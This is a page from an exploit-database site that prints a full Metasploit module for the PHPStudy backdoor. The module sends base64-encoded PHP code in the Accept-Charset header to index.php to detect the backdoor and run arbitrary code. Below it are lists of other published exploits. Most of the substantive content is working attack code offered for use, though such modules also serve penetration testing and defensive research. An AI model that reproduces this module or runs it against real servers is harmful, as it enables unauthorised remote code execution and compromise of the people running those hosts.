Menu

Search for hundreds of thousands of exploits

"PHPStudy - Backdoor Remote Code execution (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "PHPStudy Backdoor Remote Code execution",
      'Description'    => %q{
        This module can detect and exploit the backdoor of PHPStudy.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Dimensional',  #POC
          'Airevan'       #Metasploit Module
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['PHPStudy 2016-2018', {}]
        ],
      'References'    =>
        [
          ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 20 2019",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/'])
      ])
  end
  def check
    uri = target_uri.path
    fingerprint = Rex::Text.rand_text_alpha(8)
    res = send_request_cgi({
      'method'  =>  'GET',
      'uri'     =>  normalize_uri(uri, 'index.php'),
      'headers' =>  {
        'Accept-Encoding' =>  'gzip,deflate',
        'Accept-Charset'  =>  Rex::Text.encode_base64("echo '#{fingerprint}';")
      }
    })

    if res && res.code == 200 && res.body.to_s.include?(fingerprint)
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end
  def exploit
    uri = target_uri.path
    print_good("Sending shellcode")
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(uri, 'index.php'),
      'headers' => {
          'Accept-Encoding' => 'gzip,deflate',
          'Accept-Charset'  => Rex::Text.encode_base64(payload.encoded)
      }
  })
  end
end
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-17"VMWare Fusion - Local Privilege Escalation"localmacosGrimm
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
Release DateTitleTypePlatformAuthor
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
2020-03-12"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-12"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection"webappsphp"Daniel Monzón"
2020-03-11"Wordpress Plugin Search Meter 2.13.2 - CSV injection"webappsphp"Daniel Monzón"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading"webappsphp"Andrea Cardaci"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion"webappsphp"Andrea Cardaci"
2020-03-10"Persian VIP Download Script 1.0 - 'active' SQL Injection"webappsphpS3FFR
2020-03-10"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution"webappsphp"Andrea Cardaci"
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-10"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting"webappsphpEn_dust
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Sentrifugo HRMS 3.2 - 'id' SQL Injection"webappsphpminhnb
2020-03-09"60CycleCMS - 'news.php' SQL Injection"webappsphpUnkn0wn
2020-03-04"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read"webappsphpNgoAnhDuc
2020-03-03"Alfresco 5.2.4 - Persistent Cross-Site Scripting"webappsphp"Alexandre ZANNI"
2020-03-03"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection"webappsphpemaragkos
2020-03-02"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)"webappsphp"Lucas Amorim"
2020-03-02"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)"webappsphp"Jinson Varghese Behanan"
2020-02-27"Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Meisam Monsef"
2020-02-26"PhpIX 2012 Professional - 'id' SQL Injection"webappsphpindoushka
2020-02-25"Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass"webappsphpGeekHack
Release DateTitleTypePlatformAuthor
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-10"Nagios XI - Authenticated Remote Command Execution (Metasploit)"remotelinuxMetasploit
2020-03-09"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"remotemultipleMetasploit
2020-03-09"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-03-05"EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)"remotemultipleMetasploit
2020-03-05"Exchange Control Panel - Viewstate Deserialization (Metasploit)"remotewindowsMetasploit
2020-02-24"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)"remotelinuxMetasploit
2020-02-24"Android Binder - Use-After-Free (Metasploit)"localandroidMetasploit
2020-02-24"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-02-17"Anviz CrossChex - Buffer Overflow (Metasploit)"remotewindowsMetasploit
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-10"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-02-10"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)"remotelinux_mipsMetasploit
2020-02-10"Ricoh Driver - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-02-07"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-01-23"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-01-17"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-01-15"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)"remotelinuxMetasploit
2019-12-30"Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)"locallinuxMetasploit
2019-12-30"Microsoft UPnP - Local Privilege Elevation (Metasploit)"localwindowsMetasploit
2019-12-30"OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)"localopenbsdMetasploit
2019-12-18"OpenMRS - Java Deserialization RCE (Metasploit)"remotelinuxMetasploit
2019-11-20"FreeSWITCH - Event Socket Command Execution (Metasploit)"remotemultipleMetasploit
2019-11-20"Bludit - Directory Traversal Image File Upload (Metasploit)"remotephpMetasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48192/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse